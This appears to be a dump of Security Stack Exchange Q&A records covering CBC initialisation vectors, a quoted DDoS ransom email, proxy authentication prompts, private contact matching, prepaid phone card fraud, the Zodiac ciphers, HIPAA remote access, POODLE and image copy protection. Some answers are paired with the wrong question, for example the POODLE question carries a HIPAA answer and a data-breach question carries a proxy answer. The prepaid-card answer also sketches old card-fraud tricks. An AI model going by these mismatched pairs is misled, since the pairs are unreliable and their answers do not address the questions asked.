same or different each time. This should, hopefully, help you understand why the IV doesn't need to be secret. Knowing the IV doesn't get an attacker anywhere, because the IV is only there to ensure non-equality of ciphertexts. The secret key is what protects the actual data. To emphasise this even further, you don't even need the IV to decrypt all but the very first block. The decryption process for CBC works in reverse: decrypt a block using the secret key, then xor the result with the previous ciphertext block. For all but the very first block, you know the previous ciphertext block (you've got the ciphertext) so decryption is just a case of knowing the key. The only case where you need the IV for decryption is the very first encrypted block, where the previous ciphertext block is imaginary and replaced with the IV. | {
"source": [
"https://security.stackexchange.com/questions/122274",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28654/"
]
} |
122,336 | I received the following email, addressed to me at an email address on my personal domain (for which I run my own mail server on a VPS): FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE
DECISION! We are Armada Collective. lmgtfy URL here Your network will be DDoS-ed starting 12:00 UTC on 08 May 2016 if you
don't pay protection fee - 10 Bitcoins @ some-bitcoin-address If you don't pay by 12:00 UTC on 08 May 2016, attack will start, yours
service going down permanently price to stop will increase to 20 BTC
and will go up 10 BTC for every day of attack. This is not a joke. Our attacks are extremely powerful - sometimes over 1 Tbps per second.
And we pass CloudFlare and others remote protections! So, no cheap
protection will help. Prevent it all with just 10 BTC @ some-bitcoin-address Do not reply, we will not read. Pay and we will know its you. AND YOU
WILL NEVER AGAIN HEAR FROM US! Bitcoin is anonymous, nobody will ever know you cooperated. Obviously, I'm not going to pay the ransom. Should I do anything else? Update: I forwarded the email and original headers to the originating ISP. They replied that "Measures have been taken." So, umm, yay? I guess? | Based on the following article you may simply want to ignore it. This seems to be a common scam and your e-mail looks almost exactly like the one from the following article. http://arstechnica.com/security/2016/04/businesses-pay-100000-to-ddos-extortionists-who-never-ddos-anyone/ Look up the source ISP of the service provider that sent the e-mail and contact their abuse team [email protected] . They may disable the source of the e-mails or alert the unsuspecting customer that may own the machine. Notifying the source ISP is helpful to reduce the amount of this. Make sure you send them an e-mail with full headers. If the source appears to be a compromised system at a large company I would notify them in addition to the ISP. Do this by CC'ing both the company and the ISP at the same time for fastest results. Keep in mind some malicious systems may also be impersonating as a compromised host even though it's not so notifying the ISP may actually be more important than notifying the owner of the system. | {
"source": [
"https://security.stackexchange.com/questions/122336",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/74909/"
]
} |
122,380 | My Chrome browser keeps prompting me for Facebook authentication, even though I have never logged on to Facebook from my PC. I am using Chrome browser from my company where they have a strong proxy to avoid social networking sites. Though, I never even tried to open Facebook or any application/site related to FB. But I am constantly getting this pop up when ever I open any site. Is that a security threat? Edit I am sorry but I don't have any knowledge about proxy server configuration. However, I can tel you about configuration of proxy account: Well there are two scenarios, by default Automatically detect setting is enabled which doesn't allow us to access anything other than intranet site. However, when I am connected to VPN then I am able to use another proxy which allow me to access Google & other technical sites. (I can access Gmail, SO, Blogs but not Facebook) | TL;TR: it is probably a BlueCoat ProxySG or similar proxy which can be configured to behave that way. Nothing to worry about. Details: What you see is a dialog for HTTP basic access authentication . This is not what Facebook uses for authentication. This means that this dialog is not from Facebook itself. My guess is that facebook.com is filtered by your "strong proxy to avoid social networking sites" but that access to this site is allowed for some authorized users. Thus what you see here is the authentication requested by the proxy you use. Usually proxy authentication is different from site authentication and it would show you that the proxy and not facebook requires authentication. But some software/appliances can be configured to issue a site authentication when used as a transparent proxy, i.e. when not being explicitly configured as proxy inside the browser. One such proxy software is BlueCoat ProxySG. From their documentation it can be seen that it will return a site authentication (code 401) instead of proxy authentication (code 407) when used as transparent proxy: The ProxySG appliance issues an OCS-style challenge ( HTTP 401 ) for the first connection request from an unauthenticated client. This leaves the question why you get this authentication request everywhere. My guess is that you don't get the dialog everywhere but on all sites which embed the Facebook Like button, which is almost everywhere. The site connect.facebook.net you see in the dialog is the Facebook SDK for the Like button. | {
"source": [
"https://security.stackexchange.com/questions/122380",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95560/"
]
} |
122,392 | For example, see this story. Am I missing something here? Are the login details actually still encrypted? I don't understand how it is possible for a data breach of what I assume is encrypted information (GMail, Yahoo etc) to end up in an exploitable form (which I assume is only plaintext?). | TL;TR: it is probably a BlueCoat ProxySG or similar proxy which can be configured to behave that way. Nothing to worry about. Details: What you see is a dialog for HTTP basic access authentication . This is not what Facebook uses for authentication. This means that this dialog is not from Facebook itself. My guess is that facebook.com is filtered by your "strong proxy to avoid social networking sites" but that access to this site is allowed for some authorized users. Thus what you see here is the authentication requested by the proxy you use. Usually proxy authentication is different from site authentication and it would show you that the proxy and not facebook requires authentication. But some software/appliances can be configured to issue a site authentication when used as a transparent proxy, i.e. when not being explicitly configured as proxy inside the browser. One such proxy software is BlueCoat ProxySG. From their documentation it can be seen that it will return a site authentication (code 401) instead of proxy authentication (code 407) when used as transparent proxy: The ProxySG appliance issues an OCS-style challenge ( HTTP 401 ) for the first connection request from an unauthenticated client. This leaves the question why you get this authentication request everywhere. My guess is that you don't get the dialog everywhere but on all sites which embed the Facebook Like button, which is almost everywhere. The site connect.facebook.net you see in the dialog is the Facebook SDK for the Like button. | {
"source": [
"https://security.stackexchange.com/questions/122392",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92420/"
]
} |
122,412 | We have a mobile app that, given two users, needs to let them see what common contacts they have based on their phone numbers. How can we do this in a cryptographically secure way and respecting the users' privacy (i.e. without sharing the numbers in plain-text between them or with a server)? Our current solution is: (On phone A) Generate a single random salt. (On phone A) Take all phone numbers from phone A and generate a SHA512 hash with multiple rounds for each phone number using the salt generated from step 1. Something like sha512(sha512(sha512(phonenumber + salt) + phonenumber + salt) + phonenumber + salt) . (On phone A) Send these hashes along with the salt to phone B (via a server). (On phone B) Repeat step 2 to generate hashes for its own phone numbers using the same salt generated on phone A. (On phone B) Compare the two list of hashes - a matching hash means a matching phone number, and therefore a common contact. Is this a flawed approach, prone to rainbow-tables/brute-force attacks, and if so is there any other solution that is more suitable? Maybe using bcrypt with a given salt is better than doing multiple rounds of sha512 ? | bcrypt would be a somewhat better approach because it is designed to be (programmably) slow. Using a large enough salt and a reasonable complexityFactor, bcrypt(salt + number, complexityFactor) should yield a viable hash and you avoid "rolling your own cryptography", which could possibly turn out to be a difficult sell. To increase security you just crank up complexityFactor . An attacker would now have to generate the bcrypt not only of every 10-digit phone number (which could be feasible: there are only 10 10 numbers after all), but of every possible salted sequence. With a 10-character base64 salt (60 bits of entropy), the complexity increases of twenty orders of magnitude. Brute forcing Suppose you have 1,000 contacts . The CPU of your average phone seems to be two orders of magnitude slower than a server core array. I think it's reasonable to say that it will be three orders of magnitude slower than a semi-dedicated GPU implementation of bcrypt , which is said not to be so efficient . So we tune bcrypt to take 100 milliseconds for each encoding. This means that we need 1 minute 40 seconds to generate our 1,000 hashes, which is a reasonable time for one thousand contacts (a progress bar seems in order). If the user only has 100 contacts, he'll be done in 10 seconds. The attacker, given the salt of one number, has to generate perhaps 10 8 numbers to reasonably cover the mobile number space (the first number, and possibly the first two, aren't really 10 or 100 -- I count them as 1). It will take three orders of magnitude less than 10 8 times 100 milliseconds, i.e. than 10 7 seconds. This is down to 10 4 seconds, or around two hours and a half (or a whole day if the GPU optimization thingy turns out not to work). In less than four months, the whole 1,000 contacts will have been decrypted - using one optimized server. Use ten such servers, and the attacker will be done in two weeks . The problem, as pointed out by Ángel's answer and Neil Smithline's comments, is that the key space is small . In practice user A will produce something (a hash block, or whatever) to be made available somehow to B. User B must have a method that works like matches = (boolean|NumberArray) function(SomethingFromA, NumberFromB) (little changes if the second parameter is a set of N numbers, since UserB can build a set using one true number and N-1 numbers known to be fake or not interesting. It can lengthen attack time by a factor of N). This function works in a time T... actually this function must work in a time T short enough that user B, in a commercial real world application, is satisfied. Therefore one bound we can't easily dodge is that M numbers must be checked in an acceptable time on an average smartphone . Another bound we can't reasonably dodge is that User B can supply fake numbers to the algorithm (i.e. people that aren't really contacts, and possibly do not even exist). Both bounds also are enforced if the checker is on a third server; this only assures a lower execution time limit that can thwart some scenarios, such as "decrypt all UserA's numbers", but not others such as "verify who has this number", as in drewbenn 's answer). From these two bounds arise the fact that using a smartphone (or a third party server with minimum execution time enforcement), cycling through all 10 8 reasonable numbers takes about 10 8 smartphoneTime time, or on the order of one thousand months. Attack strategies to decrease this time are distributing the attack between several verifiers, or running it on a non-throttled and faster server (this requires the algorithm being available, but assuming the contrary is security through obscurity), and they look both feasible and affordable. A loophole? One possibility could be to introduce a small probability of false positives . I.e., the above oracle function will occasionally (say once every ten thousand contacts), and deterministically on UserA's input, return true to one of UserB's numbers. This means that the brute force attack on 10 8 numbers will yield UserA's contacts mingled with 10 4 other numbers. Determinism on UserA's input means that two successive checks on these 10 4 found items won't further whittle them. Unless UserB's can grab a different copy of UserA's input, which will yield a different set of false positives and allow filtering the true contacts as the intersection of the two sets, this may make the bruteforced answer less appealing. This comes at a cost - honest UserBs will have to get the occasional false hit. We really can't win If UserB must be able to answer the question "Is number X among UserA's contacts?" in a reasonable time with certainty, the time expenditure is linear , because the system cannot prevent two such requests from being made against numbers X1 and X2, and time for request X2 will be the same for request X1. Therefore, solving two numbers will require double that reasonable time; by induction, solving for N numbers will entail N times that reasonable time ( not , say, N 2 ). The difference between a legitimate request and an attack is that the attack will work on a space ten to a hundred thousand times larger. Being linear, it will require a time up to one hundred thousand times longer... but it also may run on a machine or group of machines one hundred to one thousand times faster. Therefore, our attacker will always be able to decrypt all of UserA's contacts in a "still not unreasonable" time. The only serious check to this would be for the checks to be run on a third, trusted machine with rate limiting and the means of detecting a likely attack. To thwart an attacker we need something bad to increase with the increase of N, and since it can't be running time (which doesn't increase enough), I think the only resort left is the probability of false positives. The attacker will still get the answer, but we might still succeed in making a bruteforced answer less usable. One simplistic implementation (poor man's Bloom filter) To answer Mindwin's comment, the local algorithm can't work by hiding information - the information must be missing in the first place, otherwise we'd be still be doing security through obscurity. One method would be for UserA (Alice) to send over the bcrypt salt for her (say) 1000 contacts, followed by 1000 incomplete bcrypt hashes. If the hashes are truncated at the i-th byte, there will be pseudo-random collisions. Among UserB (Bob)'s contacts, which are few, collisions will be very rare (unless i is really small). Among the attacker(Eve)'s whole number space, collisions will be significant. Note that phone number distribution is not flat, so Eve can have ways of whittling those collisions by removing, say, unused numbering sequences. If every contact hash has a probability of collision of one in a thousand, Bob, checking his one thousand contacts, has a probability of (1 - 1/1000) 1000 of having no collisions at all - that's 70%, not so good. If collision probability is 1/10000, Bob with one thousand contacts will have 90% chances of not getting even one collision. On a hundred contacts only, no-coll probabilities for Bob are 90% and 99% respectively. Eve, verifying 10 8 numbers, even with p = 1/10000, will always get ten thousand collisions no matter what. Sending two or more hashes with higher collision probability does not change things much for either Bob or Eve, in comparison to sending a single hash with collision probability equal to the product of the separate hashes. For example instead of 1 round with p = 1/10000, use two rounds with p = 1/100, since 1/100*1/100 = 1/10000. So Alice sends two sets of unordered incomplete hashes, with different seeds, and higher collision probability of 1%; Bob will test his 1000 contacts and get positive matches for the 100 contacts he has in common; the remaining 900 shouldn't match, but since the hash is incomplete, 1% of them will, that means 9 spurious contacts, and Bob will end up with 109 likely candidates after running 1000 tests. He now has to test those 109 with the second hash, which also has 1% probability. The 100 true intersections will still match. Of the remaining 9, likely none will pass. The chance of a contact passing two such rounds is 1% of 1%, i.e. 1 in 10000, and the chance of having not even one false positive on 1000 nonmatching contacts is (1-1/10000) 1000 , or 90.48%, exactly as before. With the same numbers, Eve will get one million false positives on her first round, and will have to run one million extra tests. 1% of those will match the second round, leaving Eve with ten thousand false positives mixed up with the one thousand contacts from Alice. Eve has had to run 101 million tests instead of 100, and Bob had to run 1109 tests instead of 1000. In proportion, the double-hash scheme impacts Bob harder than Eve. It would be better to use a single hash with higher complexity. The privacy problem of answering the question "Does Alice know number N?" will remain unaddressed - the time to answer that is the same for Bob and Eve. | {
"source": [
"https://security.stackexchange.com/questions/122412",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109734/"
]
} |
122,507 | I'm a TV scriptwriter - and not hugely tech-savvy, so please bear with me... If the police have an email, sent by a suspect over a 3G or 4G network, could they use the IP address (since they know when it was sent) to find out - from the service provider - the precise location the email was sent from? | The problem with this scenario is that emails are typically not sent from the device itself, but from a central service. In order to do what you want, the investigators would have to make a few hops: to the email service (gets the user account details, including the IP the user used to connect with) to the ISP the device used at the time of sending (gets the general location of the connecting IP, or if lucky, the known IP of the user's home) At best, using 3G/4G, investigators might get the cluster of towers the user was in the middle of. No exact location. BUT, with all that info, it might be possible for investigators to breach the phone's data or the user's other accounts and determine the location of the device using the multitude of location services modern devices have (Find My Phone, Facebook, Instagram, etc.) (Insert a whole host of legal issues currently in the news, like Stingray). Edit: You don't specify the country (or reality) you are dealing with. There are some countries that have set up massive detection nets so that every mobile device is physically tracked no matter where it goes. That way, investigators can have a real-time, accurate map of a particular device at any time. | {
"source": [
"https://security.stackexchange.com/questions/122507",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109844/"
]
} |
122,521 | Suppose I have a prepaid public telephone card containing £5 in it. Now I connect this card to my laptop and figure out where in the card £5 is stored. I then change this to £5000, and leave the rest of the card untouched. Wouldn't this modification allow me to make many calls for the total cost of £4900, even if originally I could have only used £5? | Back in the 90s these prepay cards were easily hacked in a number of ways. First, as you said, people could reprogram them with much larger amounts for free calls. A more low-tech method was that they'd simply scratch off or cover the conductive surface on the pin which decreased the amount on the card, allowing for infinite free calls on a one-time topup. These systems are now almost universally obsolete. Modern prepay cards usually use one of two methods. In some cases they'll contain just a numeric identifier (ID) and your balance will be maintained on a remote server, which is the case with many MAN systems. These are usually the most secure, but they have a downside: you need continuous connectivity between the phone system and the remote server. However, in some scenarios (particularly remote areas with poor infrastructure) the validation can't be done against a remote server. Instead, the prepay card is a smart card (similar to a SIM) with certain functions exposed. Each function requires a different access key. One function is "charge an amount to the card", and the key for this is present in a payphone box. However, this key can't be used to access the "add funds to the card" function, which is only accessible by top-up devices in stores. The keys in top-up devices are kept in tamper-sensitive systems, similar to how chip & pin machines work. The actual amount value on the SIM is kept in an encrypted form within a tamper-proof EEPROM (or similar), with an authenticity record maintained using a key pair deployed in the phones and top-up machines. Attacking these is very difficult, but potentially possible if you compromise a top-up machine. | {
"source": [
"https://security.stackexchange.com/questions/122521",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105521/"
]
} |
122,603 | Alright, so I know this may sound dumb, but I'm having a hard time understanding what an encryption would be since it's different from a hash. I've read up on it, but I'm still not quite sure. So, I was hoping you guys could help me with it. | Encryption vs. Hashing Nobody really "encrypts" a password, although you could... but you'd be encrypting it with another password, and you would need that password to decrypt the first password. When it comes to passwords, we normally hash them. Hashing is simply one-way. You cannot get the string back, you can only check to see if a string validates against a hash. If your string validates against the hash, this does not guarantee that it's the same "password," but you can log in with it because you've found a collision . The "message"/password is usually limited to a small number of characters, relatively speaking. Encrypting is two-way. For example, you have an algorithm, a key, and a message. Using the key, you can unlock the message. Usually, the message could be of arbitrary size. Makeshift Flowchart Examples I made a couple flowcharts that are overly simplified. Hope it helps. See the above? It doesn't make any sense that you would get the "message" back. Why? You're already entering the password, which is the "message" itself. Now look at this: With encryption , you're getting the decrypted message back if the decryption key is correct. You use the key to unlock the encrypted contents. With hashing , you already have the "message" if it validates, or a collision. What you enter is the message. | {
"source": [
"https://security.stackexchange.com/questions/122603",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109966/"
]
} |
122,607 | The Zodiac Killer was a serial killer in the late 60's and early 70's. The twist is, he would frequently taunt the local press with cryptic letters. Four of these letters were actually encoded, but only one has been cracked to date. I'm doubtful that the Zodiac Killer was a master cryptographer, at least not to the degree that one would be considered today. So why haven't his remaining three letters been cracked yet? Is this a technical problem, or is it just not being worked on? Are the letters available to the public for someone to try their hand with? | The Zodiac killer ciphers are an interesting case. As there were four ciphers sent to the local papers, I will address each in turn. They do share some common traits however. They are each their own cipher, so the 'solution' used for cipher 408 cannot be applied to the other messages. Each message has a unique character count. The Zodiac Killer sent these ciphers to newspapers with accompanying plain text messages threatening to commit additional murders (including killing school children) were the ciphers not printed in the papers. 13 The message containing this cipher was sent to the authorities postmarked April 20, 1970. This cipher was prefaced with the plain text "my name is". While the cipher contains 13 symbols, 8 of those symbols are unique. Attempts have been made to find a solution to this cipher using modern computing techniques, however the message is just too short and the possibilities are just to many to determine what 'solutions' are valid candidate solutions. 32 The message containing this cipher was sent to authorities postmarked June 26, 1970. This cipher accompanied a plain text message claiming that when decoded this cipher would lead to the location of a bomb he had buried and set to go off at a later date. The cipher was never decoded and the alleged bomb never found. The cipher had 32 symbols, 29 of which were unique - leaving pretty much nothing to analyze, essentially making it a one time pad cipher. 408 The messages containing this cipher were sent to the Vallejo Times Herald, the San Francisco Chronicle, and The San Francisco Examiner postmarked August 1, 1969. Each letter included one-third of the 408 symbol cipher. On August 8, 1969, high school teach Donald Harden and his wife Bettye of Salinas, California, solved it, however the solution did not work for the last 18 symbols of the message. The cipher was a homophonic substitution cipher, but not a simple one. Rather than using 1 symbol = 1 letter substitution, The Zodiac Killer assigned multiple symbols to each letter. It is theorized that the last 18 letters of the cipher are filler symbols added to ensure that the three papers received equal portions of cipher text. There have been attempts to find a meaning for this last potion of the cipher "EBEORIETEMETHHPITI" via anagram, however there are 740 billion ways to anagram 18 letters and nothing meaningful has come of these attempts. It's notable however that the rotation of symbols for each letter was consistent across the cipher until the last 18 letter, lending credence to the filler explanation. It's also interesting to note that The Zodiac Killer appears to have been a bad speller, or perhaps they struggled to follow their own code keys as there are spelling errors throughout the text. It's interesting however that these errors always seem to be made where the incorrect symbol resemble the intended symbol. (e.g. 'MOAT' instead of 'MOST' where the symbol for 'A' is a filled in triangle and the symbol for 'S' is a triangle with a dot in it. 340 The message containing this cipher was sent to authorities postmarked November 8, 1969. There are a number notable differences between the 340 cipher and the 408 cipher which make 340 more difficult to 'solve'. The first difference is that it is 68 characters shorter, giving a substantially shorter message to analyze. 7 symbols which appeared in 408 were removed from 340 and 16 entirely new symbols were added in. These changes in addition to the shorter message have posed a real problem for analysis efforts. Methods of analysis: Symbol repetition by row and column - 340 has many rows but no columns without repeating symbols, which supports that the text is meant to be read horizontally. There is also a pattern, where the first three rows contain no repeated symbols, and then exactly at the half way point, another three rows which contain no repeating symbols. This has spawned a theory that the original cipher was created twice as wide, then cut in half vertically to put one side above/below the other as a means of obstruction. Repeating Bigram analysis - when comparing 408 to 340, it is notable that 408 has 62 bigrams where as 340 only has 25. This is interesting because if you look at bigrams in randomly scrambled cipher text, you will normally get around 20 in this sized text. This would not support a horizontal text pattern. Additionally, if you cut the text in half - the first half has significantly more bigrams than the second half. This would indicate that something in the cipher is disrupting the naturally occurring bigrams. Repeating Trigram analysis - when comparing 408 to 340, it is notable that 408 has 11 trigrams where as 340 only has 2. Whatever is disturbing the bigram count does not appear to be disturbing the trigram count. This favors the theory of a horizontal reading direction. Bigram distance analysis - This type of analysis looks at the possibility of symbol transposition. This analysis as been inconclusive and no conclusions have been able to be drawn. Homophonic substitution analysis - Strongest example (symbols L/M) repeat 7 times. odd/even analysis - Very wide spread of bigram counts. Less than 1% of randomized trials show this even of a bigram spread. Notable Oddities Two pivot pairs appear in the cipher text. The chances of this happening naturally Once in this size of text is 1 in 50,000. This may or may not be significant. Two strange 'box corner' patterns appear in the text between the 'O' and 'C' symbols. "ZODAIK" seems to appear in the cipher at the bottom left of the last line of text, if you replace a solid triangle symbol with a 'D' My Conclusion To answer your questions specifically; Why haven't his remaining three letters been cracked yet? 13 is too short. 32 is essentially a one time pad. 340 is short, complicated and nigh-on nonsensical. Is this a technical problem, or is it just not being worked on? It's a technical problem. without patterns, no amount of pattern analysis is going to make a difference. Are the letters available to the public for someone to try their hand with? Yes. There are multiple forums dedicated to this task. The 340 cipher is still being actively pursued by a dedicated community. There are several forums ( http://zodiackillersite.com , http://zodiackillerfacts.com , http://zodiackiller.com ) focused on finding a solution. The shortness of the cipher and the number of symbols pose a real challenge to investigators. It would be interesting to see if an AI like Watson or Deep Blue would be able to make any headway on this, however at this point, to some degree its academic. No solution to this cipher will be able to bring any peace to those affected by the murders. If you are truly interested in this topic, I would HIGHLY recommend you listen to the video I've listed in my sources and visit the forums. The people who are working on this will be able to go into FAR more depth than I'm able to. Sources: Wikipedia Zodiac Killer Ciphers Youtube - David Oranchak | {
"source": [
"https://security.stackexchange.com/questions/122607",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91221/"
]
} |
122,687 | My take on reducing the risk of being hacked on products and installation have often been to create false footprints. From my own experience, the servers I've spent most time (and hate) on hacking have been those that have claimed to be something they are not. For example faking services on certain ports that imitate a Windows 2008 server, while in fact the server is a completely different type. Given of course that one takes all normal approaches to system security, first the traditional with code reviews, system hardening etc - then offensive security testing with penetration testers. What are the downsides? I specifically appreciate links to articles and sources on the topic. Am I fooling myself that this has any effect? I know personally that I am triggered by the first sign of a specific system and would waste time. Most likely increasing (A) the chance of me giving up and trying another approach (or another server/service/target) and (B) the chance of discovery and back-tracking from the attacked target. | It's a lot of work. Not only that, but it's a lot of work that your (legitimate) users will never see or benefit from. Most people would be willing to trade off the nebulous risk of deterring a small subset of hackers (realize that APT hackers, in particular, wouldn't be dissuaded and might even find an extra way into your system if you do something wrong setting up your fake services) in exchange for developing real features that will attract real (paying) customers. If you've convinced yourself that you're a real target, sure, set up some honeypots (at least then you can invest in measuring how many attempts are being made on your "misdirection servers"). Security is already expensive, and you're talking about adding extra cost, so make sure it's worth it. | {
"source": [
"https://security.stackexchange.com/questions/122687",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47562/"
]
} |
122,692 | I have a web application that the Yandex spider is trying access into back-end a few times. After these spider searching, there are few Russian IP addresses that try to access back-end too and they failed to access. Should I block Yandex or take another action? Update: The Yandex spider visits a back-end URL about once per 2-3 day. We did not release any back-end URL at the front-end. The " back-end " meanings:
the web application's interface just allowing our administrative to manage the application | Should i block Yandex Why? First, if the bot is a legitimate search engine bot (and nothing else), they won't hack you. If not, blocking a User agent won't help, they'll just use another one. If your password is good, fail2ban is configured, the software is up to date etc., just let them try. If not, you need to fix that, independent of any Yandex bots. To make sure the problem is actually Yandex, try disallowing it in robots.txt and see if it stops. No => not Yandex. (Did set up a new webserver some weeks ago. One hour after going online, had not even a domain yet, a "Googlebot" started trying SQL injections for a non-existent Wordpress. It was fun to watch, as there were no other HTTP requests. But I did not block Google because of that.) | {
"source": [
"https://security.stackexchange.com/questions/122692",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/93224/"
]
} |
122,760 | We are a healthcare IT company. My machine has PHI on it. Our IT contractor verbally asked if he could remote in to fix my printer so I said sure. I expected some sort of prompt to allow it but he was just in. Some form of VNC I guess. Is this okay? In regards to HIPAA? | HIPAA does not get to specifics of policy, the substance of it is that organization have to have sufficient controls in place to protect data. There's nothing inherently wrong with an unprompted takeover from a HIPAA perspective, as long as other controls (authentication, authorization, access control lists, access logging and auditing, antimalware on the support PC, legal agreements in place between the support organization and your organization, etc) are in place. So without knowing what your organization has in the way of IT security policies, processes and procedures there's no way to tell. As for whether unprompted take-overs are a good thing then no, they are not. You really want to have a warning when someone is taking over your PC for support, or even looking at your screen. | {
"source": [
"https://security.stackexchange.com/questions/122760",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76064/"
]
} |
122,766 | I always thought that if a server supports SSLv3 and CBC ciphers, then it is vulnerable to POODLE. But it looks like that is not the case. For example, for Google.com, SSL Labs says that the SSL POODLE attack is mitigated even though it supports CBC ciphers with SSLv3. On further investigation, I found that if SSL Labs detects that a server prefers RC4 over CBC (SSL 3: 0x5 is mentioned next to SSL POODLE result). Now MITM can only provide CBC ciphers to Google.com, then it will only choose CBC (out of what I provide), and it will still be vulnerable to POODLE. But then why does SSL Labs says it is not? | HIPAA does not get to specifics of policy, the substance of it is that organization have to have sufficient controls in place to protect data. There's nothing inherently wrong with an unprompted takeover from a HIPAA perspective, as long as other controls (authentication, authorization, access control lists, access logging and auditing, antimalware on the support PC, legal agreements in place between the support organization and your organization, etc) are in place. So without knowing what your organization has in the way of IT security policies, processes and procedures there's no way to tell. As for whether unprompted take-overs are a good thing then no, they are not. You really want to have a warning when someone is taking over your PC for support, or even looking at your screen. | {
"source": [
"https://security.stackexchange.com/questions/122766",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/81562/"
]
} |
122,848 | Does correcting a misspelled username and prompting the user with a valid username introduce a security risk? I recently tried logging into facebook and misspelled my email. They prompted me with the message below. Log in as {username} {email}@gmail.com · Not You? Please Confirm Password It looks like you entered a slight misspelling
of your email or username. We've corrected it for you, but ask that
you re-enter your password for added security. I know usernames aren't really a secret but when a website fixes a misspelling to a correct one, they seem to be taking the 'not a secret' a little too far. | As you said, you saw this on facebook - so I tried these steps: Login with [email protected] and real password -> works Login with [email protected] and real password -> works, too (!) Login with [email protected] and real password -> also works Login with [email protected] and real password -> also works Login with [email protected] and wrong password -> Wrong password, but email got automatically corrected to the right email Login with [email protected] in a private tab (or a browser with cleared cache & cookies) -> "The email you’ve entered doesn’t match any account" As the correction only seems to work when I have already successfully logged into FB at this PC, I would say that this is not a vulnerability in facebook. Edit: Added new test cases; thanks Zymus, simbabque and Micheal Johnson for the suggestions | {
"source": [
"https://security.stackexchange.com/questions/122848",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/110194/"
]
} |
122,922 | Let me begin by stating that I'm aware it's extremely tedious or virtually impossible to prevent individuals from pirating content. I'm working on a website for a client who is a relatively well known cartoonist. We're working on methods to prevent users from ripping off his work and republishing it, or more so from reproducing it offline , be it on mugs, or similar. I intend to use WordPress on the backend. I was demonstrating to him how ridiculously easy it is to bypass the disabled right-click. TLDR: I was wondering what are the other methods to discourage or deter a user from copying an image, and reproducing it? (I'm aware of watermarking, but it really spoils how the image looks.) I've already referred to these questions: Are there DRM techniques to effectively prevent pirating? Is it possible to prevent unauthorized copying or recording of data by photographing screens? Prevent Users from Downloading Javascript, Images | There is no way to block saving of images, but here are some ideas to make it harder. To prevent right-clicking the image to save it, you can overlay a transparent div on it. The user will then right-click the div instead of the image below it and the context-menu will not show "Save image as". You could use a data URL to show the image so that there is no separate file on the server to link to. You could use hotlink protection by checking the referer before serving images. Even with all these countermeasures, any user can just make a screenshot of the page and crop the image out of it. Given it is very easy to bypass these countermeasures, you may consider not implement any anti-downloading functionality at all. Use of the images is already protected by law. | {
"source": [
"https://security.stackexchange.com/questions/122922",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105894/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.